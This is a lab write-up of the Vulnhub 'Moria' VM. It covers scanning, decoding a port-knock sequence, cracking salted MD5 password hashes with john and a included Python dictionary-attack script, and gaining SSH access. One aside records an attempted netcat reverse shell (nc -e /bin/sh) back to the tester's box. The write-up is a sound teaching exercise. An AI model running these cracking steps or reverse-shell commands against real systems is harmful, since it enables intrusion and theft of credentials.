Vulnhub Walkthrough: Moria

I was asked to test a VM created by a fellow mod of the netsecfocus slack community (netsecfocus.com, netsecfocus.herokuapp.com). Here is a writeup of "Moria" by the ever-so-clever @abatchy!


Step 1: Find it.

netdiscover -r 192.168.207.0/24


Nice. Let's do a quick little initial scan with nmap.

nmap -p- 192.168.207.137


Ok, let's throw it in a web browser and see what happens.

Hmm, nothing here other than this picture. Let's throw dirb at it.

dirb http://192.168.207.137 -w

Browsing to 192.168.207.137/w/h/i/s/p/e/r/ shows a page called the_abyss, which seems to display a random line of dialog. Instead of refreshing it over and over to get the message, I did this:

for i in {1..1000}; do curl -s http://192.168.207.137/w/h/i/s/p/e/r/the_abyss/ >> ~/abyss.txt; echo >> ~/abyss.txt; done; sort ~/abyss.txt | uniq

Which returned the following (I believe this has changed to be a little more obvious in the official release):

My first thought was port knocking, so I tried https://github.com/pan0pt1c0n/knock-knock, mostly because of the string "Knock knock", but I didn't have any luck with that. Perhaps I'm not the one who is supposed to be knocking...

tcpdump -vvnn -l | grep 192.168.207.137 | grep 192.168.207.129

I let this run for a bit and returned to this output (some has been omitted)

Connections from Moria to my Kali box! (I encourage you after rooting it to take a look at the script that does this. It's pretty clever.)

The ports in question are: "77 101 108 108 111 110"

If you plug those numbers into an online decimal-to-ASCII converter, you get "Mellon".
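The same decoding can be scripted instead of pasted into a converter. The block below is an added example and not part of the original walkthrough: it parses a constructed sample of `tcpdump -nn` output (the addresses are the ones used in this post, but the packet lines are made up, not a real capture of the VM), keeps only fresh SYNs from Moria to the Kali box, and reads the destination ports as decimal ASCII. A retransmitted SYN reuses the same source port, so the code collapses repeats by source port rather than by destination port; collapsing by destination port would swallow the second 108 and break the word.

```python
import re
from typing import List

# Constructed sample of `tcpdump -nn` output. The addresses match the ones in this
# walkthrough, but the packets are made up for the example, not a real capture.
SAMPLE_CAPTURE = """\
10:12:01.000001 IP 192.168.207.137.40001 > 192.168.207.129.77: Flags [S], seq 1, win 29200, length 0
10:12:01.000050 IP 192.168.207.129.77 > 192.168.207.137.40001: Flags [R.], seq 0, ack 2, win 0, length 0
10:12:01.100001 IP 192.168.207.137.40002 > 192.168.207.129.101: Flags [S], seq 1, win 29200, length 0
10:12:01.200001 IP 192.168.207.137.40003 > 192.168.207.129.108: Flags [S], seq 1, win 29200, length 0
10:12:01.300001 IP 192.168.207.137.40004 > 192.168.207.129.108: Flags [S], seq 1, win 29200, length 0
10:12:01.400001 IP 192.168.207.137.40005 > 192.168.207.129.111: Flags [S], seq 1, win 29200, length 0
10:12:01.500001 IP 192.168.207.137.40006 > 192.168.207.129.110: Flags [S], seq 1, win 29200, length 0
10:12:02.400001 IP 192.168.207.137.40005 > 192.168.207.129.111: Flags [S], seq 1, win 29200, length 0
10:12:03.000001 IP 192.168.207.129.51000 > 192.168.207.137.22: Flags [S], seq 9, win 29200, length 0
"""

# Matches the "IP src.sport > dst.dport: Flags [..]" part of a tcpdump -nn TCP line.
PACKET_RE = re.compile(
    r"IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]+)\]"
)


def extract_knocks(capture: str, src: str, dst: str) -> List[int]:
    """Return the destination ports of new SYNs from src to dst, in capture order.

    Only pure SYNs (Flags [S]) count: SYN-ACKs ([S.]) and resets are replies, not
    knocks. A retransmitted SYN keeps its source port, so source ports already seen
    are skipped; a genuinely repeated knock to the same port comes from a fresh
    ephemeral source port and is kept.
    """
    seen_sports = set()
    ports: List[int] = []
    for line in capture.splitlines():
        m = PACKET_RE.search(line)
        if not m:
            continue
        if m.group("src") != src or m.group("dst") != dst or m.group("flags") != "S":
            continue
        sport = int(m.group("sport"))
        if sport in seen_sports:
            continue
        seen_sports.add(sport)
        ports.append(int(m.group("dport")))
    return ports


def decode_ports(ports: List[int]) -> str:
    """Interpret each port number as a decimal ASCII code; non-printable values become '?'."""
    return "".join(chr(p) if 32 <= p < 127 else "?" for p in ports)


if __name__ == "__main__":
    knocks = extract_knocks(SAMPLE_CAPTURE, "192.168.207.137", "192.168.207.129")
    print(knocks, "->", decode_ports(knocks))  # [77, 101, 108, 108, 111, 110] -> Mellon
```

To use it against a real capture, save the `tcpdump -nn` output to a file and pass its contents in place of `SAMPLE_CAPTURE`; the source/destination arguments are the VM and the attacking box.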

Maybe this is a password; let's check FTP.

Oh look, a username (Balrog). Neat.

(When I first went through this, I saw the Balrog user in the ftp banner, and tried "Mellon" over ssh. It spat out "WRONG GATE" and kicked me off. After this happened I tried to execute something like this: "ssh Balrog@Moria 'nc -e /bin/sh 192.168.207.129 8080'", with no success.)

So I poked around a little bit:

"QlVraKW4fbIkXau9zkAPNGzviT3UKntl" looks fishy, let's check it out.

Cool. Hashes. BUT WAIT! There's more!

A little salt action in the sauce. At least he gave us the recipe: "MD5(MD5(Password).Salt)".

Let's tidy this up a bit...

Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe

Saved it as 'mypasswd' and sent it to john...

john -form=dynamic_6 mypasswd
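For reference, what john computes when told `dynamic_6` is md5(md5($p).$s): the inner MD5 is rendered as lowercase hex, the salt is appended as text, and the result is hashed again. The following is an added example, not code from the original post or the VM: it implements that scheme, parses the `user:hash$salt` lines in the layout used for `mypasswd`, and runs a small constructed wordlist against a constructed entry (the user `Gimli`, its password and its salt are made up for the demonstration; the real hashes from the VM are only parsed here, not cracked).

```python
import hashlib
from typing import Dict, Iterable, Tuple

# The hash lines as tidied up in this post (the mypasswd file); only parsed below.
MYPASSWD = """\
Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe
"""

HEX_DIGITS = set("0123456789abcdef")


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def dynamic_6(password: str, salt: str) -> str:
    """MD5(MD5(password).salt) as John's dynamic_6 interprets it: the inner digest is
    lowercase hex, the salt is appended as text, and the concatenation is hashed again."""
    inner = md5_hex(password.encode("utf-8"))
    return md5_hex((inner + salt).encode("utf-8"))


def parse_entry(line: str) -> Tuple[str, str, str]:
    """Split a 'user:hash$salt' line into (user, hash, salt), validating the digest."""
    user, rest = line.strip().split(":", 1)
    digest, salt = rest.split("$", 1)
    if len(digest) != 32 or set(digest) - HEX_DIGITS:
        raise ValueError(f"{user}: {digest!r} is not a 32-character lowercase MD5 hex digest")
    return user, digest, salt


def make_entry(user: str, password: str, salt: str) -> str:
    """Build a line in the same layout; used here to construct test data with a known password."""
    return f"{user}:{dynamic_6(password, salt)}${salt}"


def crack(lines: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Dictionary attack. Because every user has a different salt, each candidate has to be
    re-hashed per user; there is no shared table to look up. Returns {user: password}."""
    targets = [parse_entry(line) for line in lines if line.strip()]
    words = list(wordlist)
    found: Dict[str, str] = {}
    for user, digest, salt in targets:
        for word in words:
            if dynamic_6(word, salt) == digest:
                found[user] = word
                break
    return found


if __name__ == "__main__":
    for user, digest, salt in (parse_entry(line) for line in MYPASSWD.splitlines()):
        print(f"{user:8s} hash={digest} salt={salt}")
    # Constructed entry with a known password so the cracking loop has something to hit.
    demo = make_entry("Gimli", "axe", "Zz9")
    print(crack([demo], ["mithril", "durin", "axe"]))  # {'Gimli': 'axe'}
```

The per-salt re-hashing in `crack` is the reason salting matters even with a fast hash like MD5: a wordlist of N words against M differently salted users costs N×M hashes rather than N, and a precomputed table for unsalted MD5 is useless here.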

How rude, Maeglin...

Maybe we can finally get a low priv shell!

This is the part where @abatchy (almost) made me cry. I probably spent somewhere between 8-12 hours in this shell. At one point I even made a list of every file on the system in order of creation date to try and see how he did it.

So here's the first thing I did when I logged in:

I poked around in the (empty) .bash_history, and looked through .ssh

I believe the exact thought that went through my head was "Weird that he took the time to generate a private key for Ori when we authenticated with a password. Also weird that the known_hosts file has only localhost in it. Huh, anyways off to try every other thing I can think of."

Oops.

Lessons learned:

1) Follow through with your suspicions, leave no stone unturned.

2) Privilege escalation is a massive topic.

and of course

3) Try harder!


Thank you so much @abatchy for letting me test this VM! You made something super cool and I hope to work with you more in the future!